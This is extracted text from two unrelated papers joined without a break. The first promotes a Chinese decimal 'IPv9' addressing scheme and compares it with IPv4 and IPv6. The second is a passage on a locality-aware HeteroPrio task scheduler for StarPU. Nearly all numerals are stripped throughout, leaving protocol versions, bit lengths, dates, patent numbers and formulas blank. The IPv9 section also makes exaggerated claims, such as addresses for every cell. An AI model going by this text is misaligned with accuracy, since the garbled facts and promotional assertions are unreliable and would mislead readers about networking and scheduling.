its destination, each computer connected to the internet must have a unique address. at present, there are three kinds of address compilation methods: one is "ip address", which consists of four digits divided by the dot; the other is "domain name", a series of strings split by dots, and the third is "chinese domain name system", which consists of a three-level domain name split by a decimal and an oblique line. these three address structures have become the current network system; bringing great convenience to people's international journal of advanced network, monitoring and controls volume , no. , access to the internet, the network has completely changed people's lives. i. problems with ipv and ipv a. problems with ipv ) insufficient address internet uses ipv protocol address scheme, the address number up to , due to the early development of the internet to estimate the development trend of internet, the ip allocation is not reasonable, address resources are exhausted, although no classification of addressing cidr technology, network address translation nat technology to alleviate the crisis, but still can't solve the problem. and address will be more and more widely used in e-commerce logistics code, space code, identity code, digital currency, three-dimensional geographical code and other intelligent terminals, the original address allocation technology cannot meet the needs of social development. ) route table expansion the topology of address space directly results in the form of address allocation independent of the network topology. with the increase of the number of networks and routers, the excessively expanded routing table increases the search and storage overhead and becomes the bottleneck of the internet. at the same time, the length of packet head is not fixed, and it is very inconvenient to extract, analyze and select routes by hardware, so it is difficult to improve the throughput of routing data. then there is the uneven distribution of ip addresses. due to its origin in the united states, more than half of all addresses are owned by the united states, resulting in a serious imbalance in the distribution of ip addresses. ) lack of quality of service (qos) ipv was originally designed for military use, and was not intended to be open to the outside world. as a result, qos of quality of service and security were very poor, and it was difficult to provide rich qos functions for real-time multimedia, mobile ip and other commercial services. although the later developed protocols such as rsvp provided qos support, the cost of planning and constructing ip network was relatively high. despite of its shortcomings, ipv was the first network all over the world, and people had got to used it, so it will going forever. b. problems with ipv the length of ipv is bits, or addresses. the address space is much larger than the -bit address space. moreover, the principle of aggregation is adopted, which enables the router to represent a subnet with an entry in the routing table, it greatly reducing the length of routing table in the router and improving the speed of forwarding packets. the addition of multicast support and flow control over ipv has led to significant advances in multimedia applications, providing a good network platform for, quality of service control (qos). despite its obvious advantages, ipv has a big flaw in the design of its address structure. the shortcomings are as follows. ) structural hierarchy disorder ipv confuses the network hierarchy in the design, and the interface id inserts the physical address into the logical address layer, which on the one hand results in the physical address space forming a limitation on the empty ip address, the security does not belong to the content of the ip layer, it is not necessary to design security technology in the ip layer. because with the development of security technology, security methods and key length will change constantly, so the development of security technology will eventually lead to the need for ip address redesign. ) ambiguous address space in the unicast address with more ipv applications, the structure of "network id+ host id" similar to ipv is adopted from a large point of view, and the network international journal of advanced network, monitoring and controls volume , no. , id of ipv is changed into a three-layer more structure with a fixed length of subnet prefix: "top-level aggregation id+ secondary aggregation id+ site-level aggregation id". ipv is a kind of patchwork addressing. so its address space is not pure bits. ipv address space is not the -bit address space that people think of. due to the special address structure design, ipv itself has to go through three significantly different version transitions if it wants to truly implement the -bit address space, the ipv for -bit effective address space; ipv for -bit valid address space. the transition between the three versions is like to upgrade the three different protocols. ) incompatible with ipv ip address is the basic protocol of the internet, and it is very difficult to solve it through complete replacement. initially, without further study, the designers of ipv decided that the -address space problem of ipv could not be solved by a smooth upgrade, so they simply redesigned it entirely from scratch. ipv requires all nodes of the entire network to support the new ip protocol, and all terminal operating systems and applications to support upgrades, making the problem extremely difficult. these shortcomings are also the main reason why ipv has not been widely used since its emergence. ii. future network ipv a. process of ipv in december , xie jianping, a scholar from shanghai, china and the inventor of the future network, applied to the national intellectual property administration (nipa), prc (formerly the patent office of china) for the invention patent of "the method of assigning addresses to computers connected to the network with full digital codes", which was officially authorized by the nipa on november , . in december , mr. xie jianping registered the copyright in the national copyright administration of china in “the method of unified compilation and distribution of addresses of networked computers and intelligent terminals”, “the overall distribution method of computer addresses allocated by full decimal algorithm for networked computers”, and “the gateway of decimal number”. in october , the “copyright of ipv protocol and application” was registered. in , the former science and technology department of the ministry of industry and information technology of china established the china decimal network standards working group (ipv working group) with enterprises as the main body and industry, university and research institute as a combination. in , the “code for digital domain names” was published, defining the "decimal network, ipv resource record and management organization". in , the former ministry of industry and information technology of china formally defined ipv as the "future network" to distinguish the next generation of the internet for ipv . in , the authoritative professional institutions of the us government have confirmed legally and technically that china has the core technology of sovereign network with independent intellectual property rights under the ip framework. this is the patented technology of ipv which is different from the existing technology of the us internet. the official patent name is "method of using whole digital code to assign address for computer". in december , the u.s. federal patent and trademark office issued a patent certificate numbered us , , , stating in its notice of approval that the applicant's identification report was "very convincing". international journal of advanced network, monitoring and controls volume , no. , on may , and march , , the united states twice voted in favor of the china-led "naming and addressing" and "security" of the future network. on february , , the state council issued the national science and technology infrastructure construction medium and long term plan ( - ), in order to break through the future network basic theory and support the new generation of internet experiments, the construction of future network test facilities. on june , , the ministry of industry and information technology of china released relevant industry standards for ipv implemented nationwide: including sj/t "for products and services based on the technology of radio frequency domain rules", "sj/t decimal network based rfid tag information orientation, query and service discovery technology standard", sj/t "used digital id format in information processing products and services", sj/t "the network architecture of rfid tags information query service specification", sj/t "based on the electronic tag information of decimal network location, query and service discovery and application". b. about ipv ipv is completely independent intellectual property rights on the basis of full decimal digit code, it has of cyberspace sovereignty, including from mother root, master root, root name servers, using zero trust security communication mechanism after verification first, compatible with the current internet system, with overlapping geographical position and the ip address space for the future network architecture. on the basis of compatibility with all the functions of the internet at present, ipv adopts the tcp/ip/m three-layer and four-layer hybrid architecture, with mixed virtual and real circuits, to complete the video data transmission of large code stream. ipv obtained chinese patent in (cn ), and has obtained authorized patents successively in more than ten countries and regions, including south africa, turkey, kazakhstan, russia, south korea, north korea, hong kong, canada, singapore, australia, mexico and norway. ipv applied for us patent in . it was issued seven times of "non-final rejection opinion" and six final rejections by the us patent office. during this period, it was repeatedly criticized by senior members of the us ietf and famous american it companies. in december , the us patent and trademark office officially issued a patent certificate numbered us , , , and clearly stated in its approval notice that the appraisal report provided by the applicant was “very convincing”. in december , the us patent and trademark office officially issued a patent certificate numbered us , , , and clearly stated in its approval notice that the appraisal report provided by the applicant was "very convincing". iii. special characteristics of ipv ) address space is huge ipv has a larger address space than ipv /ipv . ipv defines the bit length of ip address is , that is, there are - addresses; while the length of ipv is , that is, - addresses, the standard length of an ipv address is - , with layers address structure design will be - ( - ). to put it mildly, if ipv were widely used, every grain of sand in the world would have an ip address. then after ipv is widely used, the smallest molecule of bright matter in the whole universe will have a corresponding address. it is no exaggeration to say that if ipv is fully applied, every cell and living gene in the world can be assigned to an ipv address. layer is the asset management address (including legal digital currency space) compatible with ean-ucc barcode length. ) route tables are smaller international journal of advanced network, monitoring and controls volume , no. , ipv has a smaller routing table than ipv . the address allocation of ipv follows the principle of aggregation at the beginning, which enables the router to represent a subnet with an entry in the table, this greatly reducing the length of routing table in the router, and improving the speed of forwarding packets in the routing table. the routing table of ipv is very small, and the address allocation of ipv follows the principle of geo-spatial clustering from the beginning, which enables ipv router to represent a country subnet and an application subnet with a single record, it greatly reducing the length and cleanliness of routing table in the router, and improving the speed of forwarding packets by routing table. at the same time, this subnet can express a specific geographical location, for example, we assign the ipv address segment of shanghai as [ [ ]/ , then in other routers of the same level, only one route pointing to the address segment of [ [ ]/ can realize the ipv address routing of shanghai. according to this logic, only one route is needed from country to country. for example, the route to china is / . the ipv routing table is large and irregular, and the ipv routing table is smaller than ipv , but the ipv routing table contains no geographic information and the routing is messy. ) automatic configuration support ipv adds support for automatic configuration of variable length addresses, which is an improvement and extension of dhcp protocol of ipv , making network management more convenient. ipv supports multicast, and supports the iso/iec c future network << naming and addressing >>tcp/ip/m model, and supports long packet code streams for virtual and real circuits. this allows multimedia applications on the web to ensure video quality and reduce overhead, provide faster and faster applications such as industrial controls and unmanned vehicles, and provide better and cheaper service over the internet than ipv . ) address length could be select ipv address length has a variety of options, which can realize the change of , , , , , and bit address length, and select the most appropriate address length according to different usage scenarios to reduce the routing overhead. ) dual encryption the address length of ipv is long enough to realize dual encryption from the transmission of source and target addresses, which plays an important role in some specific network transmission fields. ) add location information to the address ipv addresses can be embedded with geo-location information, as well as personal and industry id information, this making ip addresses uniquely tied to personal information. ) compatible with previous addresses ipv address is backward compatible with ipv /ipv address. in order to absorb the upgrade difficulty of ipv incompatibility with ipv , ipv protocol remains and unchanged, so that ipv /ipv upgrade to the new version of ipv , the upgrade cost is very low. ) sovereignty is different ipv /ipv addresses spaces and copyright ownership: united states. ipv address space and copyright ownership: china. iv. feature of ipv ipv technology has many features; a comparison of ipv and ipv , ipv features is listed below. javascript:; international journal of advanced network, monitoring and controls volume , no. , table i. comparison between ipv and ipv item ipv ipv bit length address format dot decimal, uncompressible [ ] bracket decimal notation, with zero compression, can be compressed on both sides network express mask or length prefix representation length prefix express that supports public geographic space clustering loop address . . . [ ] public address common public ip address aggregate global address location unicast addresses automatic configuration automatically configured address ( . . . / ) link-local address: [ / broadcast address contains broadcast address no broadcast address, transitional support broadcast address unspecified address . . . [ ] domain name resolution ipv host address(a) resource record ipv host address (aaaaaaaa) resource record mother root server space bits ( - addresses) realized bits ( - addresses) design objective bits root domain server name letters from a to m letters from n to z china top-level domain .cn .chn inverse resolution in-addr.apra domain in-addr.apra domain compatibility incompatible with ipv addresses compatible ipv address:y]y]y]y]x:x:x:x:x:x:d.d.d.d compatibility incompatible with ipv addresses compatible ipv address:y]y]y]y]y]y]y]d.d.d.d transition address no transition address ipv :[ ]d.d.d.d 简写 j.j.j.j encryption no ip address encryption dual encrypted of the source address and the destination address address length fixed bits not fixed,canbe 、 、 、 、 、 、 bits geographic information no geographic location information geographic location information can be embedded dhcp nonsupport dhcp added support for automatic configuration of variable - length addresses iso/iec c & tcp/ip/m model not supported supported communication rules communicate first, then verify verify before communication network model tcp/ip tcp/ip/m sovereign america china international journal of advanced network, monitoring and controls volume , no. , table ii. comparisons between ipv and ipv item ipv ipv bit length address format colon-separated hexadecimal with zero compression, single compression [ ] [ ] bracket decimal notation, with zero compression, can be compressed on both sides network express mask or length prefix representation length prefix express that supports public geographic space clustering loop address :: [ ] public address can aggregate the global single point transmission address aggregate global address location unicast addresses link-local address fe ::/ [ / broadcast address no no broadcast address, transitional support broadcast address unspecified address : : : : : : : : [ ] domain name resolution ipv host address(aaaa) resource record ipv host address (aaaaaaaa) resource record mother root server space bits ( - addresses) realized bits ( - addresses) design objective bits root domain server name letters from a to m letters from n to z china top-level domain .cn .chn inverse resolution ip .int domain in-addr.apra domain compatibility incompatible with ipv addresses compatible ipv address:y]y]y]y]x:x:x:x:x:x:d.d.d.d compatibility incompatible with ipv addresses compatible ipv address:y]y]y]y]y]y]y]d.d.d.d transition address no transition address ipv :[ ]d.d.d.d 简写 j.j.j.j encryption no ip address encryption dual encrypted of the source address and the destination address address length fixed bits not fixed,canbe 、 、 、 、 、 、 bits geographic information no geographic location information geographic location information can be embedded dhcp support dhcp, no automatic configuration for variable-length addresses added support for automatic configuration of variable - length addresses network model tcp/ip tcp/ip/m iso/iec c & tcp/ip/m mode not supported supported communication rule communicate first, then verify verify before communication network model tcp/ip tcp/ip/m sovereign america china international journal of advanced network, monitoring and controls volume , no. , v. conclusions the ipv protocol uses - arabic digital network as the virtual ip address and uses decimal as the text representation method, which is a convenient way to find online users. ipv has a large number of assignable ip addresses, and the maximum number of address bits is × in order to improve efficiency and facilitate end users, some addresses can be used directly as domain names, which is the cornerstone of the future digital world. at the same time, ipv is also called "new generation security and reliable information integrated network protocol" because it uses the classification and coding of the original computer network, cable broadcast television network and telecommunication network. ipv technology and the whole network architecture make china to be the second country in the world with complete future network architecture. this paper introduces the generation process and characteristics of ipv , and compared with the existing internet, with the continuous optimization and improvement of ipv future network, it will be applied in many other countries. references [ ] xie jianping etc.method of using whole digital code to assign address for computer [p]. us: , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks.rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] cerf, network working group. a view from the st century, rfc . . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] radio frequency identification tag information query service network architecture technical specification. sj/t - , . [ ] soliman h., castelluccia c., malki k. e., bellier l. hierarchical mobile ipv (hmipv ) [ ] johnson d., perkins c., arkko j. mobility support in ipv ,” rfc , june . [ ] perkins c.e. ip mobility support for ipv ”, ietf rfc , jan. [ ] farinacci d., fuller v., meyer d., lewis d. interworking lisp with ipv and ipv ”, draft-ietf- lisp-interworking- , aug. [ ] meyer k.f.d., & zhang l. rfc : report from the iab workshop on routing and addressing, september . [ ] dommety g., & jain r. potential networking applications of global positioning systems (gps), technical report tr- , the ohio state university ( ). [ ] recommendation itu-t y. identification framework in future networks [ ] itu-t y. ( ), framework of node identifier and locator separation in ipv -based next generation networks [ ] itu-t y. ( ), ngn identity management framework [ ] itu-t y. ( ), identification framework in future networks [ ] ietf rfc , hierarchical mobile ipv mobility management (hmipv ) [ ] ietf rfc ( ), the naming authority pointer (naptr) dns resource record impact study of data locality on task-based applications through the heteroprio scheduler hal id: hal- https://hal.inria.fr/hal- submitted on may hal is a multi-disciplinary open access archive for the deposit and dissemination of sci- entific research documents, whether they are pub- lished or not. the documents may come from teaching and research institutions in france or abroad, or from public or private research centers. l’archive ouverte pluridisciplinaire hal, est destinée au dépôt et à la diffusion de documents scientifiques de niveau recherche, publiés ou non, émanant des établissements d’enseignement et de recherche français ou étrangers, des laboratoires publics ou privés. impact study of data locality on task-based applications through the heteroprio scheduler bérenger bramas to cite this version: bérenger bramas. impact study of data locality on task-based applications through the heteroprio scheduler. peerj computer science, peerj, , , pp.e . � . /peerj-cs. �. �hal- � https://hal.inria.fr/hal- https://hal.archives-ouvertes.fr impact study of data locality on task-based applications through the heteroprio scheduler bérenger bramas camus team, inria nancy—grand est, illkirch-graffenstaden, france abstract the task-based approach has emerged as a viable way to effectively use modern heterogeneous computing nodes. it allows the development of parallel applications with an abstraction of the hardware by delegating task distribution and load balancing to a dynamic scheduler. in this organization, the scheduler is the most critical component that solves the dag scheduling problem in order to select the right processing unit for the computation of each task. in this work, we extend our heteroprio scheduler that was originally created to execute the fast multipole method on multi-gpus nodes. we improve heteroprio by taking into account data locality during task distribution. the main principle is to use different task-lists for the different memory nodes and to investigate how locality affinity between the tasks and the different memory nodes can be evaluated without looking at the tasks’ dependencies. we evaluate the benefit of our method on two linear algebra applications and a stencil code. we show that simple heuristics can provide significant performance improvement and cut by more than half the total memory transfer of an execution. subjects distributed and parallel computing keywords scheduling, task-based, starpu, hpc, data locality introduction high-performance computing (hpc) is crucial to make advances and discoveries in numerous domains. however, while supercomputers are becoming more powerful, their complexity and heterogeneity also increase; in , a quarter of the most powerful supercomputers in the world are equipped with accelerators (see https://www.top .org/), and the majority of them (including the top two on the list) uses gpus in addition to traditional multi-core cpus. the efficient use of these machines and their programmability are ongoing research topics. the objectives are to allow the development of efficient computational kernels for the different processing units and to create the mechanisms to balance the workload and copy/distribute the data between the cpus and the devices. furthermore, this complexity forces some of the scientific computing developers to alternate computation on cpus or gpus, but never use both at the same time. this naive parallelization scheme usually provides a speedup compared to a cpu-only execution, but it ends in wastage of computational resources and utilization of extra barrier synchronizations. meanwhile, the hpc community has proposed several strategies to parallelize applications on heterogeneous computing nodes with the aim of using all available resources. among the existing methods, the task-based approach has gained popularity: mainly because it how to cite this article bramas b. . impact study of data locality on task-based applications through the heteroprio scheduler. peerj comput. sci. :e doi . /peerj-cs. submitted january accepted april published may corresponding author bérenger bramas, berenger.bramas@inria.fr academic editor john owens additional information and declarations can be found on page doi . /peerj-cs. copyright bramas distributed under creative commons cc-by . https://www.top .org/ http://dx.doi.org/ . /peerj-cs. mailto:berenger.�bramas@�inria.�fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ makes it possible to create parallel codes with an abstraction of the hardware by delegating the task distribution and load balancing to dynamic schedulers. in this method, the workload is split into inter-dependent computational elements and is managed by a runtime system (rs). there are several rs reported in the literature (danalis et al., ; kale & krishnan, ; perez, badia & labarta, ; gautier et al., ; bauer et al., ; tillenius, ), and each of them has its own specificity and interface. we refer to a comparative study (thoman et al., ) for a detailed description where the different aspects and features of rs are categorized. task-based method is a viable solution to use modern heterogeneous computing nodes and mix computation between cpu and devices. furthermore, the potential of this approach has already been proven on numerous computational methods. in the task-based method, the scheduler is in charge of the most important decisions, as it has to decide the order of computation of the ready tasks (the tasks that have their dependencies satisfied) as well as where those tasks should be computed. in the present study, we implemented our scheduler inside a rss called starpu (augonnet et al., ), which supports heterogeneous architectures and allows customizing the scheduler in an elegant manner. in our previous work, we created the heteroprio scheduler to execute the fast multipole method (fmm) using starpu on computing nodes equipped with multiple gpus (agullo et al., b). heteroprio was first implemented inside scalfmm (bramas, ), and it was later included in starpu. it is publicly available and usable by any starpu-based code. in fact, heteroprio was later used in linear algebra applications where it demonstrated its robustness and potential, see qrmumps (agullo et al., ) and spldlt (lopez & duff, ). moreover, it was also the subject of theoretical studies (beaumont et al., ; beaumont, eyraud-dubois & kumar, , ; agullo et al., a), which revealed its advantages and gave a positive theoretical insight on the performance. however, the original heteroprio scheduler does not take into account data locality. the distribution of the tasks—the choice of the processing unit that will compute a given task—is done without considering the distribution of the data. therefore, depending on the applications and the test cases, heteroprio can not only lead to huge data movement between cpus and gpus but also between gpus, which dramatically penalizes the execution. the current work proposed different mechanisms to consider data locality in order to reduce the data transfers and the makespan. the contributions of this paper are as follows: � we summarize the main ideas of the heteroprio scheduler and explain how it can be implemented in a simple and efficient manner; � we propose new mechanisms to include data locality in the heteroprio scheduler’s decision model; � we define different formulas to express the locality affinity for a given task relative to the different memory nodes. those formulas are based on general information regarding the hardware or the data accesses; � we evaluate our approach on two linear algebra applications, qrmumps and spldlt, and a stencil application, and analyze the effect of the different parameters. bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the rest of the paper is organized as follows. in the section “background,” we introduce the task-based parallelization and the original heteroprio scheduler. then, in the section “introducing laheteroprio,” we detail our new methods to use data locality and the different mechanisms of our locality-aware heteroprio (laheteroprio) scheduler. finally, we evaluate our approach in the section “performance study” by plugging in the laheteroprio inside starpu to execute two different linear algebra applications using up to four gpus. background task-based parallelization the task-based approach divides an application into interdependent sections, called tasks, and provides the dependencies between them. these dependencies allow valid parallel executions, that is, with a correct execution order of the tasks and without race conditions. this description can be viewed as a graph where the nodes represent the tasks and the edges represent the dependencies. if the edges represent a relation of precedence between the tasks, the resulting graph is a direct acyclic graph of tasks. however, this is not the case when an inter-tasks dependency relation is used, such as a mechanism to express that an operation is commutative (agullo et al., ). in the paper, we consider graphs of the form g = (v, e) with a set of nodes v and a set of edges e. considering t ,t ∈ v, there exists a relation (t ,t ) ∈ e—also written t ! t —if the task t can be executed only after the task t is over. a task t is a computational element that is executable on one or (potentially) several different types of hardware. when t is created, it incorporates different interchangeable kernels where each of them targets a different architecture. for example, consider a matrix-matrix multiplication task in linear algebra: it could be either a call to cublas and executed on a gpu, or a call to intel mkl and executed on a cpu, but both kernels return a result that is considered equivalent. task t accesses data either in read, read-write or write and in the rest of the paper we consider equivalent the read-write and the write accesses. we denote t.data to be the set of data elements that t will access during its execution. from this information, that is, g = (v, e) and the portability of the tasks, the scheduler must decide the order of computation and where to execute the tasks. task scheduling and related work scheduling can be done statically or dynamically, and in both cases, finding an optimal distribution of the tasks is usually np complete since the solution must find the best computing order and the best processing unit for each task (peter brucker, ). the static approaches have a view on the complete set of tasks before the beginning of the execution (baptiste, pape & nuijten, ), and thus can use expensive mechanisms to analyze the relationship between the tasks. advanced strategies are also used, such as duplicating tasks to replace communications with computation (he et al., ). it is worth mentioning that these strategies can have significant overhead compared to their benefit and the execution time of the tasks, which make them unusable in real applications. bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ static scheduling requires performance models, so it can predict the duration of the tasks on the different architectures and the duration of the communications. even, if it is possible to build such systems, they require costly calibration/evaluation stages and their resulting prediction models are not always accurate, especially in the case of irregular applications. moreover, these approaches cannot adapt their executions to the unpredictable noise generated by the os or the hardware. this is why most task-based applications use rss that are powered with dynamic scheduling strategies (akbudak et al., ; sukkari et al., ; moustafa et al., ; carpaye, roman & brenner, ; agullo et al., b). in this case, the scheduler focuses only on the ready tasks and decides during the execution on how to distribute them. it has been demonstrated that these strategies are able to deliver high performance with reduced overhead. the scheduler becomes a critical layer of the rs, at the boundary between the dependencies manager and the workers, see fig. . we follow the starpu’s terminology and consider that a scheduler has an entry point where the ready tasks are pushed, and it provides a request method where workers pop the tasks to execute. in starpu, both pop/push methods are directly called by the workers that either release the dependencies or ask for a task. consequently, assigning a task to a given worker means to return this task when the worker calls the pop method. as an intuitive example, consider a priority-based scheduler designed to manage priorities with one task-list per priority. the push method can simply store a newly ready task t in the right list list[t.priority].push_back(t). meanwhile, the pop method can iterate over the lists and when it finds one non-empty list, it pops a task from it. furthermore, in the case of heterogeneous computing, a pop must return a task compatible with the worker that performs the request. managing data locality was already a challenge before the use of heterogeneous computing because of numa hardware and a simple scheduling strategy has been proposed to improve data locality on the numa nodes (al-omairy et al., ). past work has introduced distance-aware work-stealing scheduling heuristics within the ompss runtime, targeting dense linear algebra applications on homogeneous x hardware. while figure schematic view of task-based runtime system organization. a program can be described using the sequential task flow (stf) model and converted into tasks/dependencies by the rs. when dependencies are released, the newly ready tasks are pushed into the scheduler. when a worker is idle, it calls the pop function of the scheduler to request a task to execute. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the method provides a significant speedup, it does not take into account the different data accesses (read or write) or look at the cache levels to find data replication. the importance of data locality to move forward with exascale computing has been emphasized (unat et al., ) with a focus on task-based rss. the authors shown that data movement is now the primary source of energy consumption in hpc. in era of heterogeneous computing, the community has provided various strategies to schedule graphs of tasks on this kind of architecture, and one of the most famous is the heterogeneous earliest finish time (heft) scheduler (topcuoglu, hariri & wu, ). in heft, tasks are prioritized based on a heuristic that takes into account a prediction of the duration of the tasks and the data transfers between tasks. different models exist, but on a heterogeneous computing node, the duration of a task can be the average duration of the task on the different types of processing unit. more advanced ranking models had been defined (shetti, fahmy & bretschneider, ). however, this scheduler has two limitations that we would like to alleviate. first, it uses a prediction system, which may need an important tuning stage and may be inaccurate, as we previously argued. second, even if ranking a set of tasks can be amortized and beneficial, re-ranking the tasks to consider new information concerning the ongoing execution can add a dramatic overhead. this is why we have proposed an alternative scheduler. heteroprio multi-priorities within heteroprio, we assign one priority per processing unit type to each task, such that a task has several priorities. each worker pops the task that has the highest priority for the hardware type it uses, which are cpu or gpu in the present study. with this mechanism, each type of processing unit has its own priority space. this allows to continue using priorities to manage the critical path, and also to promote the consumption of tasks by the more appropriate workers: workers do first what they are good at. the tasks are stored inside buckets, where each bucket corresponds to a priority set. then each worker uses an indirect access array to know the order in which it should access the buckets. moreover, all the tasks inside a bucket must be compatible with all the processing units that may access it (at least). this allows an efficient implementation. as a result, we have a constant complexity for the push and complexity of o(b) for the pop, where b is the number of buckets. the number of buckets b corresponds to the number of priority groups, which is equal to the number of different operation types in most cases. a schematic view of the scheduler is provided in fig. . for illustration, let us consider an application with four different types of task ta, tb, tc and tc′ (here tc and tc′ can be the same operation but with data of small or large granularity, respectively). tasks of types ta, tc and tc′ provide a kernel for cpu and gpu and thus are executable on both, but tasks of type tb are only compatible with cpus. consequently, we know that gpu workers do not access the bucket where tb tasks are stored. then, we consider that the priorities on cpu are pcpu(ta) = , pcpu(tb) = , pcpu(tc) = and pcpu(tc′) = ; on gpu the priorities are pgpu(ta) = , pgpu(tc) = and pgpu(tc′) = . we highlight that tc and tc′ have the same priority for gpu workers. bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from this configuration, we end with four buckets: b = {ta}, b = {tb}, b = {tc} and b = {tc′}. finally, the indirect access arrays are acpu = { , , , } and agpu = { , , } with agpu = { , , } being valid as well. speedup factors the speedup factors are used to manage the critical moments when a low number of ready tasks are available. the idea is to forbid some workers to get a task from a set of buckets when their corresponding hardware type is not the fastest to compute the buckets’ tasks. to do so, the type of processing unit that is the fastest in average to execute the bucket’s tasks, is provided for each bucket. additionally, we input a number that indicates by how much this processing unit type is faster compared to the other types of processing units. these numbers are used to define a limit under which the slow workers cannot pick a task. as an illustration, let us consider two types of processing units: cpu and gpu. let si be the speedup factor for bucket i and let gpu be the fastest type to compute the task stored in i. a cpu worker can take a task from bucket i if there are more than ngpu � si available tasks in it, where ngpu is the number of gpu workers. for example, if there are three gpu workers and that a gpu is two times faster in average than a cpu to perform a given operation, then a cpu worker takes a task only if there are six or more tasks available. otherwise, it considers the bucket empty and continues to the next ones to find a task to compute. this means that for the example given in the section “multi-priorities,” we have two arrays of four items for the different operations, one to tell which processing units is the fastest, and a second one to provide the speedup. the description of the example tells us that the gpu cannot compute ta, so cpu are the fastest by default, and that tc and tc′ are the same operation but with different granularities, such that the speedup for the gpu will be higher for tc′ than tc. as a results, the arrays could be best = {cpu, gpu, gpu, gpu} and speedup = { , . , . , }. this system is used for each bucket individually and not globally. therefore, if the number of buckets is large, this can lead to overflowing some workers and artificially keeping others idle. however, we found that in practice it provides beneficial results especially at the end of simulations. figure heteroprio schematic view. tasks are pushed inside the buckets. each worker iterates on the buckets based on the priorities for the hardware it uses. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ introducing laheteroprio d task-list grid by splitting the buckets per memory nodes our first step in managing data locality is to subdivide each bucket into m different task- lists and set up one list for each of the m memory nodes. for example, if the machine is composed of two gpus and one cpu, we have three task-lists per bucket by considering numa memory nodes as a single one, without loss of generality. we obtain a d grid of task-lists g where the different buckets are in the first dimension and the memory nodes are in the second dimension, as illustrated in fig. . we store in the list g(b,m) all the tasks of the bucket index b that we consider local to the memory node m. in this context, local means that an execution on a processing unit connected to m should have the lowest memory transfer cost. the list g(b,m) can also contain tasks that processing units connected to m cannot compute. this can happen when m is a gpu and the tasks of bucket index b do not provide a gpu function. nevertheless, when workers steal tasks from g(b,m), we know that they have the highest affinity for the memory node m even if it is impossible to compute these tasks on a attached processing unit. from this description, we must provide a mechanism to find out the best memory node for every newly ready task, to push the tasks in the right list, and also decide how the workers should iterate on g and select a task. extending the example from the sections “multi-priorities” and “speedup factors,” the number of tasks list in each bucket is hardware specific because it corresponds to the number of memory nodes. task insertion in the grid with locality evaluation (push) in the original heteroprio, there is no choice where a given task has to be stored, as it must be in the list of its corresponding bucket, that is, in scheduler.list[task.bucket].push_back (task). on the other hand, in laheteroprio we have to decide in which list of the selected bucket we should put the task; we have to find the best m in scheduler.list[task. bucket][m].push_back(task). therefore, we propose different formulas to estimate the locality of a task regarding the memory nodes and the distribution of the data it uses. b u ck e ts figure laheteroprio schematic view of a grid composed of four buckets and three memory nodes. the decision that the scheduler has to do is to put the tasks in the more appropriate lists and to decide how the workers iterate on the grid. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the specificity of this approach is to determine the most suitable memory node without looking at the algorithm itself. we only look at each task individually without following the links it has with some other tasks and without making a prediction of how the pieces of data are going to move. last recently used in this strategy, we consider that the memory node related to the worker that pushes the task has the best locality; a newly ready task t released by worker w is pushed into g(t.bucket_id, w.memory_node). indeed, t and the last task executed by w have at least one data dependency in common, and this data is already on the memory node if it has not been evicted. the main advantage of this technique is its simplicity and low overhead. however, it is obviously far from accurate. for example, it does not evaluate the amount of data that is already available on the memory node compared to the total amount of data that t will use. moving cost estimation seems natural to consider that the best memory node is the one that will allow moving the data in the shortest time. starpu provides the function starpu_task_expected _data_transfer_time_for that predicts this transfer duration by looking where the pieces of data are and the possible transfer paths between the memory nodes. from this prediction, we obtain a moving cost and we refer to it as mc_starpu. data locality affinity formulas starpu’s prediction has two potential drawbacks: the first is that it treats all data dependencies similarly without making a distinction if the dependencies are read or write, and the second is that the memory transfer predictions are difficult to achieve since they are based on models that can be inaccurate and influenced by the on-going execution. therefore, we propose different formulas to estimate the locality of a task and we obtain either a locality score for each memory node (the higher the better), or a moving cost (the lower the better). this information is used to decide where to put the newly ready tasks in the grid. in our next formulas, we use the following notations dt;m ¼ t:data \ m:data; ( ) dt;:m ¼ t:data \ :m:data; ( ) dreadt;m ¼ t:data \ m:data \ read; ( ) dwritet;m ¼ t:data \ m:data \ write; ( ) read \ write ¼ [: ( ) here, dt,m is the set of data used by task t and that exist on memory node m, whereas dt,¬m represents the set of data used by t that is not on m. d read t,m and d write t,m are the sets of data used by t that exist on m and that are accessed in read mode and write mode, respectively. bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we define the sum of all the pieces of data hosted (ls_sdh) with the score given by ls sdhðm; tÞ ¼ x d dt;m d:size: ( ) the core idea of ls_sdh is to consider that the memory node that already hosts the largest amount of data (in volume) needed by t is the one where t has to be executed. if all the tasks use different/independent pieces of data and each of them is used once, then we except that both mc_starpu and ls_sdh(m,t) return meaningful scores. however, there are other aspects to consider. for example, if there is a piece of data duplicated on every node it should be ignored. moreover, we can also consider that a piece of data used in read is less critical than the ones used in write for multiple reasons. a piece of data used in read might be used by several tasks (in read) at the same time, and thus the transfer cost only impacts the first task to be executed on the memory node. in addition, a piece of data in write is expected to be used in read later on, which means that moving a piece of data that will be accessed in write on a memory node, partially guarantees that this data will be re-used soon. finally, writing on a set of data invalidates all copies on other memory nodes. thus, we define three different formulas based on these 